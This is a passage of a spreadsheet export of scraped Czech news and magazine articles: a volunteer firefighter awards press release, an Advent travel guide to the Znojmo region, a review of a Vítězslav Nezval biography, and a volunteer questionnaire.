předvolání, dobrovolného plnění ze strany vašeho Poskytovatele internetových služeb nebo dalších záznamů od třetí strany nelze informace, uložené nebo získané pouze pro tento účel, obvykle použít k vaší identifikaci. Marketing Technické uložení nebo přístup je nutný k vytvoření uživatelských profilů za účelem zasílání reklamy nebo sledování uživatele na webových stránkách nebo několika webových stránkách pro podobné marketingové účely. Autor: Gabriela Zlámalová Autor person Gabriela Zlámalová</t>
  </si>
  <si>
    <t>76</t>
  </si>
  <si>
    <t>20241201_132_3476472599_1987629787690d9e290c.html</t>
  </si>
  <si>
    <t>1987629787690d9e290c</t>
  </si>
  <si>
    <t>SLAVNOSTNÍ PŘEDÁVÁNÍ CEN DOBROVOLNÝM HASIČŮM</t>
  </si>
  <si>
    <t>SLAVNOSTNÍ PŘEDÁVÁNÍ CEN DOBROVOLNÝM HASIČŮM PADESÁTKA NEJLEPŠÍCH PŘEVZALA OCENĚNÍ ZA ZÁSAHY JEDNOTEK A ČINNOST SBORŮ V pátek 29. listopadu na slavnostním vyhlášení výsledků 14. ročníku Ankety Dobrovolní Hasiči Roku převzalo čestné ocenění 25 jednotek a 25 sborů dobrovolných hasičů z celé České republiky . Tento významný titul udělila Odborná porota Ankety již po čtrnácté. Prestižní skleněnou helmu, která je symbolem Ankety, si z brněnského Bobycentra odneslo deset oceněných s největším počtem hlasů. Oceněné v roli moderátorky večera tentokrát přivítala Barbora Černošková . Záznam z předávání odvysílá Česká televize 14. prosince na programu ČT2. Finalisté 14. ročníku Ankety Dobrovolní Hasiči Roku obdrželi zasloužená ocenění z rukou představitelů profesionálních i dobrovolných hasičů, partnerů Ankety, kteří dobrovolné hasiče v jejich činnosti dlouhodobě a významně podporují a dalších čestných hostů. V rámci letošního 14. ročníku pořadatelé zaznamenali rekordní zájem veřejnosti o hlasování. Příběhy ze zásahů a činností letošních finalistů projevilo zájem přes 130 tisíc unikátních návštěvníků stránek. Společně s hlasováním prostřednictvím webového formuláře a SMS bylo odevzdáno téměř 70 tisíc platných hlasů, což je nejvíce v historii Ankety. „Jako předseda Odborné poroty blahopřeji k získaným oceněním a děkuji všem dobrovolným hasičům, a také těm, kteří je prostřednictvím této Ankety podporují. Obrovský zájem o letošní hlasování je podle mého mínění jasným důkazem, nakolik si veřejnost uvědomuje, že spolupráce mezi profesionálními a dobrovolnými sbory je klíčová pro efektivní a rychlou reakci při krizových situacích. Neocenitelný přínos dobrovolných hasičů se koneckonců nedávno plně ukázal, a to během zářijových ničivých povodní,“ uvedl generální ředitel HZS ČR, generálporučík Ing. Vladimír Vlček , Ph.D., MBA. Díky dlouholetým partnerům Ankety obdrželi finalisté na prvních třech místech kromě ocenění i finanční a věcné dary v hodnotě přesahující 2,4 miliony korun. „Jako generální partner Ankety oceňujeme práci dobrovolných hasičů už 14 let. Současně podporujeme i dobrovolnickou činnost našich zaměstnanců, tedy například jejich účast na zásazích s hasiči. Ve zlepšování podmínek pro dobrovolné hasiče teď chceme udělat další ambiciózní krok: Už brzy představíme celonárodní iniciativu sdružující a motivující firmy přátelské ke svým zaměstnancům-dobrovolným hasičům,“ prozradil Petr Koutný, provozní ředitel společnosti GasNet a člen Odborné poroty. Vedle oceňovaných dobrovolných hasičů vznikla za podpory Ondřeje Vetchého , který je patronem Ankety i Českého národního registru dárců dřeně, nová kampaň s názvem „Buďte jako Ondřej“ , která je zaměřená na motivaci nových dárců kostní dřeně. MUDr. Pavel Jindra, vedoucí lékař registru, prozradil, že se díky této kampani podařilo během pár měsíců zaregistrovat přes 10 tisíc nových dárců a poděkoval právě dobrovolným hasičům, které kampaň nejvíce oslovuje. Generálním partnerem Ankety je od počátku společnost GasNet . Hlavními partnery Ankety jsou společnosti ČEZ , Lesy České republiky , Ford Motor Company a DCom. Partnery Ankety jsou společnosti EG.D., Pražská plynárenská Distribuce, Požární bezpečnost, Medsol, ČEPS, TATRA TRUCK , GoodPRO , ZPMV, Hasičská vzájemná pojišťovna, Techsport, Selfbrand, FILIPA, GINA Software, Poctivá od Mattoni 1873, Víno Prokeš, Rescop a Teleskopické stožáry. Hlavním partnerem slavnostního večera byla společnost Czechoslovak Group . Partnery večera byly společnosti E.ON Energie a Bobyhall. Oceňování dobrovolných hasičů probíhá pod záštitou ministra vnitra Mgr. Bc. Víta Rakušana , 1. místopředsedy vlády a ministra financí Ing. Zbyňka Stanjury , ministra zemědělství Mgr. Marka Výborného , generálního ředitele HZS ČR generálporučíka Ing. Vladimíra Vlčka a náměstka generálního ředitele HZS ČR brig. gen. Mgr. Slavomíra Bella. Spolupracujícími organizacemi jsou Hasičský záchranný sbor ČR, Sdružení hasičů Čech , Moravy a Slezska , Moravská hasičská jednota, Česká hasičská jednota. Detailní výsledky s pořadím dle obdržených hlasů najdete na www.adhr.cz 2024_11_30_TZ_ADHR_2024_Padesatka_nejlepsich_prevzala_oceneni_za_zasahy_jednotek_a_cinnost_sboru_dobrovolnych_hasicu 2024_11_30_TZ_ADHR_2024_vysledky Jiří Bezděk prezident spolku Fotogalerie 1 2 ... 8 ► ————————————————————————————————— Posláním Ankety Dobrovolní Hasiči Roku je propagovat celospolečenský přínos dobrovolných hasičů široké veřejnosti prostřednictvím již provedených zásahů a preventivní činnosti. Celkem bylo v průběhu čtrnácti ročníků Ankety Dobrovolní Hasiči Roku bylo uděleno 624 ocenění doprovázené finančními a věcnými dary ve výši 30.000.000 korun. Hlavním symbolem ocenění, které získávají finalisté na prvních místech, je od roku 2014 skleněná zásahová helma ve skutečné velikosti, která je dílem českých sklářů. V roce 2020 odborná porota udělila mimořádné ocenění – zlatou hasičskou helmu členu JSDHO za záchranu lidského života. SLAVNOSTNÍ PŘEDÁVÁNÍ CEN DOBROVOLNÝM HASIČŮM VYHLÁŠENÍ VÝSLEDKŮ ADHR 2024 UŽ V PÁTEK 29. 11. ŽIVĚ OD 19:00 INFORMACE – SLAVNOSTNÍ GALAVEČER 23. května – zasedání Odborné poroty 24. května – tisková konference – zahájení přihlašování 25. května – zahájení ROADSHOW S ČESKÝM IMPULSEM 1.6. – 31.8. – Roadshow ADHR – přehled akcí v záložce Roadshow 21. července – ukončení přihlašování 5. září – zasedání odborné komise a výběr finalistů 6. září – zahájení hlasování 20. října – ukončení hlasování 29. listopadu – slavnostní vyhlášení finalistů a předávání ocenění This message is only visible to admins. Problem displaying Facebook posts. Autor: Redakce</t>
  </si>
  <si>
    <t>129</t>
  </si>
  <si>
    <t>20241201_133_3476436381_345e541d2f181ca6e39b.html</t>
  </si>
  <si>
    <t>345e541d2f181ca6e39b</t>
  </si>
  <si>
    <t>Advent na Znojemsku plný vína, tradic a vánočních zážitků</t>
  </si>
  <si>
    <t>Advent na Znojemsku plný vína , tradic a vánočních zážitků Vyhlášená vinařská oblast na jižní Moravě s krásnou přírodou Národního parku Podyjí , s historickými památkami a s malebnými městy a vesnicemi – to je Znojemsko. Stojí za návštěvu po celý rok, během adventu je ale snad ještě kouzelnější. Na slavnostně vyzdobených náměstích, na hradech a zámcích nebo v útulných sklípcích vás čekají jedinečné vánoční akce. Vyrazte za čerty a Mikulášem , ochutnejte speciální vína , poslechněte si cimbál nebo se vydejte na některou ze speciálních vánočních prohlídek. Foto: www.znojmoregion.cz Zahájení adventu a Mikulášské nadílky Ať už vyrazíte o víkendu na přelomu listopadu a prosince v okolí Znojma kamkoliv, nešlápnete vedle. Začátek adventu se totiž bude slavnostně zahajovat v celém regionu a na větších i menších náměstích se rozezní koledy a rozsvítí vánoční stromky. Historické městečko Vranov nad Dyjí , které leží pod stejnojmenným barokním zámkem, přivítá adventní období 30. listopadu Tradičním vánočním jarmarkem, kde si budete moct pořídit dobroty a regionální produkty od místních výrobců. Nechte si ale v žaludku místo, abyste mohli pomoct vybrat vítěze v každoroční soutěži o nejlepší vánočku. A ve stejný den budou nedílnou součástí Pohádkových Vánoc v Moravském Krumlově koncerty domácích hudebních těles i českých hudebních hvězd, řemeslný jarmark, výtvarné dílničky a slavnostní ohňostroj. O pár dnu později, 5. prosince, tu v mystickém prostředí renesančního zámku proběhne velkolepá Mikulášská nadílka. Tradiční čertovskou obchůzku si můžete užít v ulicích Jaroslavic v rámci akce Čerte, čerte rohatý. Na Masarykově náměstí ve Znojmě odstartuje ve čtvrtek odpoledne Advent očima dětí, v rámci kterého si užijí zábavné plnění úkolů, Mikulášskou nadílku i Pekelnou sešlost. O poznání strašidelnější čerti se tu ale objeví v sobotu 14. prosince, kdy centrem města projde Perchtenlauf – průvod pekelných démonů z Rakouska . Foto: www.znojmoregion.cz Za vínem a vánoční atmosférou K jižní Moravě patří neodmyslitelně víno , a proto můžete během adventu vyrazit taky na spoustu speciálních akcí do místních vinných sklepů. Cech vinařů ze známé vinařské vesnice Vrbovec pořádá ve své sklepní uličce zimní a pekelnou variantu akce Otevřené sklepy. První sobotu v prosinci se v rámci akce Čertovské koštování na vánočně vyzdobené vinné sklepy, ochutnávku místních vín a k zakousnutí spoustu domácích dobrot. Chybět nebude ani potulná tlupa čertů. Za vínem se můžete o adventu vypravit i do Enotéky znojemských vín, ve které máte na výběr ze 120 druhů. Do konce roku tu najdete navíc tematickou řadu Svatomartinských a mladých vín, ale i speciální Adventní svařáček. Nový ročník ochutnáte také po Vánocích v sobotu 28. prosince na Bohutickém koštu mladých vín, který pořádá v prostorách vinného sklepa na Bohutickém zámečku vinařský spolek Sv. Michal . Foto: www.znojmoregion.cz Pokud máte rádi tradiční řemesla, folklór a staré lidové zvyky, bude se vám líbit v polovině prosince ve Chvalovicích na akci Skleněné Vánoce. V prostorách Penzionu Daníž se těšte na show mistrů sklářů a kovářů, vánoční jarmark a řemeslné dílničky. Ve stejném termínu se výjimečně otevře veřejnosti podniková prodejna Ruční papírny Stará škola v Želeticích nedaleko Znojma . Budete si tu moct pořídit originální dárky z ručně vyráběného papíru, který v této rodinné firmě vzniká manufakturní technikou starou přes 2000 let. Za hudbou vyrazte na některý z několika desítek Adventních, Vánočních, Novoročních a Tříkrálových koncertů a tancovaček. Tu tradiční si užijete třeba v sobotu 7. prosince v Hraběticích na folklórní Mikulášské besedě u cimbálu, nebo 26. prosince v kostele sv. Mikuláše ve Znojmě na tradičním Vánočním koncertě Cimbálové muziky Antonína Stehlíka. Sváteční prohlídky hradů a zámků Foto: www.znojmoregion.cz Během adventu nespí ani místní hrady a zámky. Naopak! Využijte jedinečnou příležitost, prohlédnout si je tak trochu netradičně a ve slavnostní atmosféře. Vánoční prohlídky hradu Bítov proběhnou o víkendu 7. a 8. prosince. Budete si moct projít vánočně vyzdobené první patro hradního paláce a prohlídku zakončíte v panské hradní kuchyni, kde na vás bude čekat malé občerstvení. Oba dny, vždy v 11 a 13 hodin, zazní v hradní kapli vánoční písně a koledy. Návštěvu hradu můžete také spojit se Zvěřinovými hody, které v centru Bítova pořádá rodinná restaurace U Tesařů. Kouzlo předvánočního období si nenechte ujít ani na barokním Zámku ve Vranově nad Dyjí . V sobotu 14. prosince tu proběhne v Sále předků Adventní koncert, během kterého se dominanta zámku vyzdobená freskami s antickými tématy rozezní tóny nejen vánočních koled. Během posledních dnů letošního roku, od 27. do 31. prosince si budete moct díky speciálním prohlídkám podívat, jak se toto období slavilo na panském sídle v dobách minulých. Společně s průvodcem projdete celý I. prohlídkový okruh a uvidíte nazdobené reprezentační interiéry i s unikáty, které se z depozitářů vyndávají jen pro tuto příležitost. Pokud dorazíte poslední prosincový víkend, můžete se vydat na speciální zimní plavbu ve vyhřívané lodi po Vranovské přehradě . Vánoční prohlídky nabídne 14. a 21. prosince i renesanční zámek v Moravském Krumlově , které můžete spojit s návštěvou Expozice Slovanské epopeje Alfonse Muchy . Dobrodružný zážitek pro všechny nebojácné děti v podobě Baterkových prohlídek chystají na Zámku v Miroslavi. V sobotu 28. prosince tu totiž od 16:30 do 20 hodin ožijí v rámci letošního tématu „Posmrtný život na zámku“ strašidla a duchové. Foto: www.znojmoregion.cz Zdroj infromací www.znojmoregion.cz . Reklama Autor: Vendula Kubalíková Autor Vendula Kubalíková Rubrika transition_slide Cestování</t>
  </si>
  <si>
    <t>20241201_134_3476444772_84e29e83bcca87b5e0ab.html</t>
  </si>
  <si>
    <t>84e29e83bcca87b5e0ab</t>
  </si>
  <si>
    <t>Jak se stal z&amp;nbsp;Nezvala klobásník</t>
  </si>
  <si>
    <t>Jak se stal z&amp;nbsp; Nezvala klobásník Krystyně Wanatowiczové se podařilo vykreslit básníkovu genialitu i jeho otřesný charakter Na pultech knihkupectví se momentálně nepřehlédnutelně vyjímá dílo novinářky Krystyny Wanatowiczové s titulem Nezval . Básník a jeho syn. Knihu vydalo nakladatelství Kodudek, má skoro osm set stran a na její obálce pózuje básník s nevlastním synem Robertem. Obálka tlustého špalku má zelenou barvu. Stejnou, jakou měl inkoust, kterým psal Vítězslav Nezval (1900–1958) své verše i dopisy, což byl zvyk umělců oddaných surrealismu. Nezval měl ale ještě jednu, rovněž bezmála celoživotní lásku: komunismus. Proto je kniha, graficky důvtipně zpracovaná mužem její autorky Pavlem Hájkem ze studia Marná sláva, vybavená vedle zelené textilní záložky ještě druhou, rudou. Dvě šňůrky se při čtení hodí. Wanatowiczová během několikaletých příprav knihy prošla pozůstalosti obou Nezvalů , spoustu archivů včetně policejního a vyzpovídala desítky lidí, kteří měli k příběhu jedné z nejkontroverznějších postav našich kulturních dějin co říct. Text obsahuje přes 1600 číselných odkazů, které v závěru knihy na ploše víc než sta stran prozrazují, odkud zdroje cituje. Je dobré se na ně během čtení průběžně dívat – o to víc člověk ocení úctyhodnou práci, kterou má autorka za sebou. Na Nezvalův příběh narazila, když připravovala svou předchozí knihu Miloš Havel . Český filmový magnát. Havlův a Nezvalův osud se protnuly za války, kdy úspěšný kapitalista z pozice mocného filmového producenta zachraňoval komunistického literáta před nacistickou perzekucí. A zatímco Havlovi po roce 1945 stát zabavil firmu, majetek a vyhnal ho do emigrace, Nezvalovi svěřil vládu nejen nad československým filmem, ale částečně i nad celou kulturou. Wanatowiczová se odrazila právě od tohoto momentu. „Jak se z homo poeticus stává homo politicus?“ ptá se v úvodu knihy a na následujících stranách dává přesvědčivou odpověď. Nezval vstoupil do komunistické strany v roce 1924, kdy mu vyšla klíčová sbírka poetismu Pantomima. Bylo to období jeho nesporné geniality, o níž byla přesvědčena nejen veřejnost ( Nezval se díky své oblibě za první republiky nemusel živit jinou prací než psaním na volné noze), ale hlavně samotný básník. Už rok poté dostal tříměsíční podmínku za útok na strážníka, kterému v alkoholovém opojení pěstmi vysvětloval, že jako proslulý umělec přece musí stát i nad zákonem. Strážník nebyl sám, kdo s tím nesouhlasil. Když Nezvalovi v roce 1930 s Kronikou z konce tisíciletí nevyšel jeden z pokusů o komerčně úspěšný román, Ferdinand Peroutka v recenzi v Přítomnosti napsal, že „v této době se papír popisuje a potiskuje s neobyčejnou snadností, ale přece jen je na nebesích nepochybně stanoven rozdíl mezi řídkou stolicí a psaním románů“. Wanatowiczová naznačuje, že právě tady se to mohlo v Nezvalově přemýšlení zlomit. Bylo mu teprve třicet, ale už se naučil nesnášet neúspěch. Nejjednodušší cestou, jak se mu do budoucna vyhnout, bylo získat si mocného spojence. Ideálně z mimokulturních kruhů a tím se pro Nezvala stala čím dál hlasitější komunistická strana. Byl jedním z literátů, kteří uvítali její radikalizaci řízenou Gottwaldem, a už v roce 1932 se mu podařilo do své komedie Milenci z kiosku uváděné v Národním divadle protlačit verše o vzdálené divukrásné zemi plné lahody a svobody, jíž bychom se měli inspirovat, čímž myslel Sovětský svaz . Dva roky před německou okupací byl s naprosto stejným zápalem schopen v básních plakat nad smrtí T. G. Masaryka a zároveň při příležitosti 20. výročí bolševické revoluce oslavovat Stalina. A když se s ním jeho přátelé Toyen, Jindřich Štyrský nebo Karel Teige hádali kvůli barbarským metodám Stalinova režimu, Nezval v roce 1938 demonstrativně rozpustil jejich surrealistickou skupinu a navěky dal vale uměleckým experimentům ve prospěch služebného psaní. Wanatowiczová tohle všechno nepopisuje jen na už obecně známých příkladech z Nezvalovy korespondence nebo ze Štyrského deníku, v němž je básník výtvarníkem připodobněn ke „strašné kouli špíny“. Ale třeba taky z dosud nepublikovaného dopisu začínajícího malíře Pavla Brázdy , který básníkovi napsal, že by někdejšímu avantgardistovi kvůli přeběhnutí ke stalinismu zajišťujícímu režimem pojištěný úspěch nejraději nafackoval. Krystyna Wanatowiczová v knize nepočítá s tím, že každý čtenář musí vědět, jak a proč Československo po válce směřovalo k totalitě. Publikace narostla do svého rozměru i kvůli podrobným vhledům do dobové politické, kulturní i sociální situace. V jednom z nich na scénu vstupuje figura, která Nezvalovi zásadně pomohla v oné proměně poety v politika. Byl to Václav Kopecký, Gottwaldova pravá ruka „na špinavou práci“, který v poválečné vládě získal pozici ministra informací a Nezval s ním hned v srpnu 1945 přijel za prezidentem Edvardem Benešem podepsat vůbec první znárodňovací dekret, jenž se týkal filmového průmyslu. Zatímco Nezval psal o Kopeckém verše „V tvé pravici je meč a po tvém boku lyra“, Kopecký se mu odměnil přidělením pozice sekčního šéfa odpovídajícího na ministerstvu za znárodněný film. Nepojila se s tím jenom obrovská moc, ale také obrovská změna životního stylu, po které Nezval jako dítě narozené do učitelské rodiny v moravské obci Biskoupky vždy toužil. Tou první bylo přidělení velkého bytu v Praze po odsunutém Němci s veškerým vybavením, k němuž patřily „dámské a pánské šaty, boty, klobouky, kravaty, hračky, vysavač, koberec a další věci“, jak Wanatowiczová zjistila v archivech. V balíku prebend bylo také služební auto s řidičem a stabilní plat, o jakém si předtím i jako úspěšný literát mohl nechat jenom zdát. Stále přitom popisujeme dobu před únorem 1948. Wanatowiczová knihu napsala jako novinářka, takže si od těchto faktů drží odstup. Klade jeden za druhým, nemoralizuje ani nepsychologizuje. Pozdvižené obočí u ní můžeme cítit jen ve chvílích, kdy popisuje Nezvalův soukromý život. K jeho potřebě být – nehledě na dvě totality, které zažil – neustále zajištěný a spokojený totiž patřila také nutkavá potřeba obklopovat se ženami, ačkoli jedna z nich se stala oddanou součástí jeho domácnosti už před válkou. Když autorka popisuje Nezvalův vztah k jeho ženě Františce „Fáfince“, která se o něj během celého dospělého života starala jako o dítě, trpělivě snášela jeho milenky i to, že se mu v roce 1954 narodil nemanželský syn, dovolí si jemně ironický komentář: „Nezvalova věrnost komunistické partaji svým způsobem připomínala vztah s Fáfinkou. Z dobrodružných výletů za jinými ženami se vždy vracel zpátky k ní domů.“ Po komunistickém převratu se už ani nemusel nikam vracet, stranu měl všude kolem sebe. Kopecký mu plat navýšil na skoro dvacetinásobek průměrné mzdy a zajistil vydávání sbírek jako Stalin nebo Zpěv míru v masivních nákladech. Jen za tyhle dvě skladby symbolizující to nejotřesnější ze socialistického realismu si Nezval vysloužil honorář, k jehož dosáhnutí by tehdy běžný člověk musel pracovat nějakých patnáct let. Definitivní krytí zad si zajistil, když ho hlavní ideolog dohlížející na komunistickou kulturu Ladislav Štoll pasoval na nedotknutelný pilíř proletářské poezie. Nezvalův vděk šel tak daleko, že souhlasil s cenzurou svých prvorepublikových textů, jež začaly vycházet v jeho sebraném Díle – s vykastrovanými pasážemi o erotice, náboženství, politice a někdejších blízkých přátelích. Wanatowiczová v knize ukazuje, že se několika těmto lidem pronásledovaným jeho stranou snažil tajně pomáhat. Na schůzích opatrně hájil Teigeho , Jiřího Koláře nebo Jakuba Demla , kterému u Kopeckého vyběhal aspoň důchod. Deml nicméně almužnu nepřijal a Nezvalovi napsal, že by to určitě nebylo zadarmo a že s takhle primitivními vládci nad kulturou odmítá „zahrát si whist“. To Nezval hrál s režimem až do konce a je zbytečné tu popisovat všechny jeho tahy. Snad jen méně známý detail: básník, jemuž se často vytýkají truchlivé verše po smrti masových vrahů Stalina a Gottwalda, byl jedním z umělců, kteří osobně v soudní síni sledovali monstrproces s Rudolfem Slánským , po kterém byl popraven Záviš Kalandra . To byl Nezvalův blízký přítel ze surrealistických časů, v němž ovšem režimní veršotepec najednou spatřoval „špatný živel“, jehož vlivu se strana naštěstí definitivně zbavila. Wanatowiczová v Nezvalově pozůstalosti nenašla jediný text, ve kterém by své amorální chování kriticky reflektoval. Přesto je přesvědčená, že svým stalinským rýmům, o nichž další jeho bývalý surrealistický druh Bohuslav Brouk prohlásil, že se kvůli nim proměnil z básníka na „klobásníka“, nevěřil. „Skládal je ze strachu, pro peníze a z ryzího pragmatismu,“ píše v závěru knihy autorka, která touto optikou nahlíží víceméně celou Nezvalovu poezii. I v jeho předválečných textech je totiž možné najít motiv, který se géniovi stal osudným. Když psal bolestné verše o umírající mamince nebo nenaplněných láskách, nikdy nepopisoval, co je tak výjimečného na osobách, které si zamiloval: ale jen co je výjimečného na jeho citech a na něm samém. A pro člověka, který nade vše klade své ego a pohodlí, nemusí žádná morálka existovat. Vítězslav Nezval to v kariéře dotáhl, kam chtěl. Už za života se mu jako umělci povinně klaněly i děti na základních školách, v třiapadesáti dostal doživotní důchod ve výši platu vysokoškolského profesora se všemi přídavky, a režim se mu dokonce nepletl ani do okázale nesocialistického soukromého života. V knize umírá na straně 400, zbytek patří zmíněným poznámkám a také osudu jeho syna Roberta. Ten je jakousi metaforou Nezvalova života po životě. Literárně nadaný chlapec byl jako dospívající koncem šedesátých let oprávněně přesvědčen, že pravá básnická síla jeho otce se nachází v předválečných textech. Lidé od něj (zvlášť vdova Fáfinka a její okolí) ale očekávali roli pokorného potomka národního umělce, jehož stalinistické verše se po nástupu normalizace opět citovaly v masových médiích. Robert tenhle tlak neunesl a dva a půl roku po invazi spáchal v šestnácti letech skokem z okna sebevraždu. Básník Jan Zábrana si do deníku po smrti Robertova otce poznamenal: „ Nezval byl bezcharakterní svině. Ano, správně. Nezval byl geniální básník. Ano, správně.“ Jestli se někomu podařilo navázat na tohle východisko a vykreslit Vítězslava Nezvala v co nejplastičtějším světle, pak je to Krystyna Wanatowiczová a její nová kniha. Pokud jste v článku našli chybu, napište nám prosím na [email protected] . Autor: Jan H. Vitvar Autor Jan Vitvar Rubrika transition_slide Kultura, Poezie, Literatura, Historie, Komunismus</t>
  </si>
  <si>
    <t>25430</t>
  </si>
  <si>
    <t>20241201_135_3476440965_f2c08a85b995958a84e7.html</t>
  </si>
  <si>
    <t>f2c08a85b995958a84e7</t>
  </si>
  <si>
    <t>ANKETA o dobrovolnictví</t>
  </si>
  <si>
    <t>ANKETA o dobrovolnictví 1. Co je na dobrovolnictví nejlepší? 2. Jak často se smějete? A jak často pláčete? 3. Rozumějí vaši blízcí tomu, proč se dobrovolnictví věnujete? 4. Kdy jste litovali? 5. Proč jste s dobrovolničením začali a jak? 6. Těšíte se na další směnu? A proč přesně? dobrovolničí 26 let, nyní pro Život 90 tzv. přátelské telefonáty – jednou dvakrát týdně volá klientce; pro Dobrovolnické centrum Agora 7 pomáhá doučovat češtinu ukrajinské seniorky – studentky Elpidy; od června 2024 je také dobrovolnicí ve Všeobecné fakultní nemocnici v Praze , kde navštěvuje pacienty, kterým se věnuje podle jejich zájmů 1. Zpětná vazba klientů. 2. Nesměju se. Přestože působím společensky a vesele, tak vůbec veselá nejsem, ale některé věci jsou úsměvné. Není to smích, ale úsměv. Určitě se nerozpláču, ale hodně věcí mě dojme. V tu chvíli to spíš nedávám najevo a odnáším si to domů, zabývám se tím po cestě. 3. Ano, rozumějí. Jen manžel by byl rád, abych do nemocnice chodila někdy i jiný den než v sobotu a měli jsme víkend pro sebe. To už ale řeším. Mnoho lidí o víkendu totiž návštěvy nemá. Pro mimopražské je to třeba daleko… nebo prostě nepřijdou. 4. Nikdy jsem nelitovala. Jen například v případě jedné dámy jsem musela kvůli své kapacitě jasně vymezit a zkrátit dobu společných telefonátů. Jsme v kontaktu už tři roky a budu ji mít, jak já říkám, doživotně. 5. Už coby důchodkyně jsem pracovala jako asistentka pana ředitele Pavláta v Židovském muzeu. Jednou jsem mu zařizovala nějaké doklady, šla jsem tam, kde je Řád maltézských rytířů , a oni zrovna měli pauzu. Tak jsem se procházela, až jsem došla do ulice Karoliny Světlé a všimla si Života 90. Zaujalo mě to, šla jsem dovnitř a brzy jsem už byla na schůzce, kde se mě zeptali, jestli bych neměla chuť jim občas pomáhat. Dřív by mě to nenapadlo, ale byla jsem pro. Nejdřív jsem pomáhala vydávat jejich časopis Generace, pak jsem chodila na přátelské návštěvy seniorů v bytech. A od té doby jsem vystřídala různé činnosti. Dvakrát mě dokonce poslali do ciziny. V nedávné době jsem na svojí jiné náhodné a neplánované cestě šla kolem Elpidy a stala se doučovatelkou dětí, nyní ukrajinských žen. V dobrovolnické činnosti jsem nikdy neviděla žádnou zvláštnost. 6. Moje příští směna bude v sobotu, jdu do nemocnice. Těším se, protože se tam seznámím s dvacetiletou dívenkou, která se přijde dívat a učit se, co a jak dělám. dobrovolničí devět let pro Adru, dvakrát až třikrát týdně chodí dělat společníka lidem do hospice ve Frýdku-Místku 1. Sociální kontakt, mám na mysli potkat se s člověkem, který je odjinud, má jiný příběh a já mám možnost se s ním setkat a poznat ho. 2. Ne že bych obecně neplakal, já někdy pláču, ale u dobrovolnictví ne. Ale směju se, mám za to, že často. Mám rád smích, takže když je jenom trochu příležitost, tak se směju, i když situace nejsou úplně k popukání. Je to tak trochu i určitá obrana. Dvakrát jsem vnímal jako velkou ztrátu, když odešel můj parťák. To bylo, jako by odešel člen rodiny. Tento parťák mi hodně přirostl k srdci. 3. Ano, moc dobře. Manželka taky dobrovolničí, jsme si vzájemnou oporou. Je důležité mít s kým sdílet situace. Cítím, že rodina je ráda za moje dobrovolničení a moje děti se mě často samy ptají, zajímá je, co v hospici dělám. 4. Kdybych litoval, přestal bych do hospice chodit. 5. Začal jsem v roce 2016. Byl to rok, který papež František vyhlásil rokem milosrdenství. A mně přišlo, že o milosrdenství hodně mluvíme, ale málo ho konáme. To mě přimělo k akci, řekl jsem si, že musím něco dělat. Tak jsme se obrátili s mojí ženou na Adru. Z toho, co nám řekli, nám dával největší smysl hospic. 6. No, těším. To se tak nedá říct. Vždy jdu do hospice s nějakým očekáváním a mám v sobě i napětí. Jak ten člověk bude reagovat? Jak to teda vlastně bude? Není to úplně tak, že bych si výskal. Jsem spíš zvědavý na to, co přijde. Někdy mlčíme, někdy jdeme na procházku, už jsme i hráli šachy nebo jsme s parťákem přečetli celou Narnii. Za jedním parťákem chodila přespávat rodina, a když jsem se ptal, jestli je neruším, řekl, že moc rád vidí někoho mimo rodinu. šest let pracuje s bezdomovkyněmi v nízkoprahové dílně Metráž 1. Člověk se dostane do úplně jiného okruhu lidí, než na jaký je zvyklý. Vystoupí ze své bubliny a zjistí, že některé jeho problémy jsou směšné ve srovnání s existenčními problémy jiných. A samozřejmě dobrý pocit, že mohu někomu pomoci jinak než penězi. 2. Při práci v dílně se smějeme často, smutek nastává při odchodu, či dokonce smrti některé kolegyně, pak dost často vzpomínáme. 3. Rozhodně, dcera mi před lety našla inzerát přímo pro mě – hledali někoho, kdo bude s ženami v obtížné sociální situaci vyrábět šperky z kůže, z korálků atp. a bude schopen jim poradit. Protože podobná činnost je moje hobby, hned jsem se přihlásila. 4. Když se některá z našich žen dostane do obtížné situace a já nejsem ve stavu jí pomoci, a ještě hůř, když ona pomoci nechce. 5. Nevím, zda se to dá nazvat dobrovolničením, jsem více než dvacet let předsedkyní spolku židovských žen WIZO, vymýšlím pro ně program – zajišťuji výlety, přednášky, divadla atd. Jsou to ženy, které přežily holokaust nebo byly ukrývané jako děti. Bohužel, pochopitelně zde nám členstvo ubývá, je nás už jen pár desítek… 6. Těším se na „holky“ (všechny staršího věku), že si popovídáme a zase se společně zasmějeme! jednou týdně už druhým rokem dochází do nízkoprahového klubu za dětmi ve věku 10–15 let 1. Jednoznačně ty děti. Baví mě, jak je každé úplně jiné a své. Myslím, že jsme si s dětmi skvěle sedly a těším se na ně každý týden. Nejlepší pocit je vidět, že k nám chodí rády, že tu s námi chtějí trávit čas. Když to na nich vidím nebo mi to samy řeknou, mám z toho obrovskou radost. Dává mi to pocit, že to, co děláme, má smysl. 2. Směju se hodně často. Děti jsou čisté duše, každé je jedinečné a má něco svého, a tahle různorodost mě baví. Nepláču vůbec. Myslím, že je to tím, že jsem dost „splachovací“. Občas mě ale přepadne smutek, hlavně kvůli nespravedlnostem, se kterými se děti potýkají. Snažím se ale věci z dobrovolničení nenosit domů. 3. Ano, rozumějí. Myslím, že když slyší, jak o dobrovolnictví a zážitcích z něj mluvím, je jim jasné, že mě to baví a naplňuje. 4. Litovala jsem v situacích, kdy jsem musela dát přednost placené práci nebo škole. Mrzelo mě, že jsem kvůli nedostatku času musela omezit činnost, která mi přijde jako jedna z nejdůležitějších a nejsmysluplnějších. 5. Začala jsem ve druhém ročníku bakalářského studia. Měla jsem nějaký volný čas a přemýšlela jsem, jak ho smysluplně využít. Vystudovala jsem sociologii, a právě tohle studium mi otevřelo oči ohledně nerovností ve společnosti. Uvědomila jsem si, jak důležité je si navzájem pomáhat. 6. Rozhodně se těším. Díky tomu, že se s většinou dětí známe už delší dobu, mě opravdu zajímá, jaký měly den, co se učily, co měly k obědu nebo jak se cítí doma a ve škole. Zní to možná jako maličkosti, ale právě ty podle mě vytvářejí to opravdové spojení mezi námi a dětmi. dělala dobrovolnici během letošních povodní v Mikulovicích 1. Pocit, že jsem někomu pomohla. 2. Nejsem moc plačka. A i zatopené lidi jsem viděla víc se smát než plakat. Vlastně to bylo povzbudivé – jak byli napumpovaní adrenalinem, brali to sportovně, byla v tom naděje, že to dobře dopadne. Pláč přišel mnohem později, když zjistili, že do zimy nestihnou dát všechno do pořádku. I já jsem brečela později, když strhávali k zemi dům, ve kterém bydlí chlapeček z mé třídy v mateřské školce, kde učím. Voda ho nesmetla, byl dost poškozený, nějakou dobu se čekalo, ale nakonec musel být zbourán. Domy se často začaly hýbat později, třeba teprve před čtrnácti dny strhli v Mikulovicích dům, který skoro nebyl zatopený, ale hnul se 